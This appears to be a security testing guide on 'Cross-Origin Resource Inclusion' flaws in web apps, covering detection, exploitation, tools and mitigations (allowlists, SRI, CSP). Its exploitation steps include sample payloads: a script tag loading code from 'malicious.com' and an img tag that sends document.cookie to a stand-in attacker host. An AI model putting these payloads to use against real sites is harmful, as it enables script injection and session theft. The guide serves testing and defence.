Cross-Origin Resource Inclusion (CORI) vulnerabilities occur when a web application allows external resources (e.g., scripts, stylesheets, or images) to be included or loaded from untrusted sources. This can lead to unauthorized data exfiltration, execution of malicious scripts, or other security issues.
To identify and exploit scenarios where an application improperly includes cross-origin resources, enabling attackers to inject malicious resources or exfiltrate sensitive data.
-
Inspect the application for externally loaded resources, such as:
- JavaScript files
- CSS files
- Images
- Fonts
-
Analyze resource loading mechanisms:
- Dynamic imports (e.g.,
import(),require()) - DOM manipulation methods (e.g.,
createElement('script'),appendChild())
- Dynamic imports (e.g.,
-
Check the application for hardcoded external URLs in:
- HTML tags (
<script>,<link>,<img>) - Inline JavaScript
- API calls that dynamically load resources
- HTML tags (
-
Review how external resource URLs are validated:
- Are URLs dynamically constructed using user input?
- Is validation performed to restrict sources?
-
Inject Malicious External Resources:
- Replace external resource URLs with attacker-controlled URLs:
<script src="https://malicious.com/malware.js"></script>
- Replace external resource URLs with attacker-controlled URLs:
-
Manipulate Dynamic Imports:
- Test if user-controlled input affects dynamically loaded resources:
const script = document.createElement('script'); script.src = userInput; // Test for input control document.body.appendChild(script);
- Test if user-controlled input affects dynamically loaded resources:
-
Analyze for Data Exfiltration:
- Inject resources that attempt to exfiltrate sensitive data:
<img src="https://malicious.com/steal?cookie=" + document.cookie>
- Inject resources that attempt to exfiltrate sensitive data:
- Confirm if the application includes and executes the malicious resource.
- Assess the impact, such as:
- Unauthorized data exfiltration (e.g., cookies, tokens).
- Execution of malicious scripts.
- Integrity compromise through CSS or DOM manipulation.
- Browser Developer Tools for inspecting included resources.
- Burp Suite or OWASP ZAP for intercepting and modifying requests.
- Custom JavaScript Payloads to manipulate resource inclusion dynamically.
- CURL or Postman for testing resource URLs.
-
Validate and Restrict Included Resources:
- Implement a strict allowlist of trusted domains for resource inclusion.
- Avoid dynamically constructing resource URLs using user input.
-
Use Subresource Integrity (SRI):
- Add integrity attributes to
<script>and<link>tags to ensure resources are not tampered with:<script src="https://example.com/script.js" integrity="sha384-xyz" crossorigin="anonymous"></script>
- Add integrity attributes to
-
Enforce Content Security Policy (CSP):
- Restrict allowed sources for scripts, styles, and other resources using CSP:
Content-Security-Policy: script-src 'self' https://trusted.com;
- Restrict allowed sources for scripts, styles, and other resources using CSP:
4. **Regularly Audit Included Resources**:
- Periodically review and verify all external resources for security and reliability.
5. **Avoid Inline Resource Loading**:
- Minimize the use of inline resource inclusion to reduce potential attack vectors.
---
## References
- [OWASP Testing Guide - CORI Testing](https://owasp.org/www-project-testing/)
- [MDN Web Docs - Content Security Policy (CSP)](https://developer.mozilla.org/en-US/docs/Web/HTTP/CSP)
- [OWASP Top Ten - A05:2021 Security Misconfiguration](https://owasp.org/Top10/A05_2021-Security_Misconfiguration/)
- [W3C - Subresource Integrity](https://www.w3.org/TR/SRI/)
---